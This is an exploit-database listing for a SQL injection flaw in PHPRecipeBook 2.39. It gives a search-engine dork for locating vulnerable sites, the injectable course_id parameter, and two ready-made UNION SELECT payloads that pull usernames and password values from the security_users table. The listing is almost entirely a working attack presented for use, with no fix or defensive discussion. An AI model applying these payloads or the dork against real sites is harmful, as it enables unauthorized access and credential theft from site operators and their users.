[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability

Author
DarKdewiL
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4984
Category
web applications
Date add
30-03-2009
Platform
unsorted
=================================================================
PHPRecipeBook 2.39 (course_id) Remote SQL Injection Vulnerability
=================================================================


//////////////////////////////////////////////////////////////////////
////////////////////////////1923TURK - GRUP///////////////////////////
//////////////////////////////////////////////////////////////////////
**********************************************************************
[!] Script : PHPRecipeBook
[!] Verison : 2.39
[!] Download : http://sourceforge.net/projects/phprecipebook/

[-] Bugs : Remote SQL injection Exploit 
[-] Dork : inurl:"/index.php?m=" "PHPRecipeBook 2.39"
[-] Date : 31-03-09(19:33)
[+] Author : DarKdewiL

[!] Note : Always use the time you have to finish your work.
  Never leave it to the last minute.
  Once time goes away, it never comes back

**********************************************************************
//////////////////////////////////////////////////////////////////////
**********************************************************************
[-- Bugs --]

(+)

/index.php?m=recipes&a=search&search=yes&course_id=[SQLEXP]

[-- SQL EXPLOIT --]

Username exploit : -7+union+select+1,user_login,3,4,5,6,7+from+security_users--
Password exploit : -7+union+select+1,user_password,3,4,5,6,7+from+security_users--



#  0day.today [2024-12-24]  #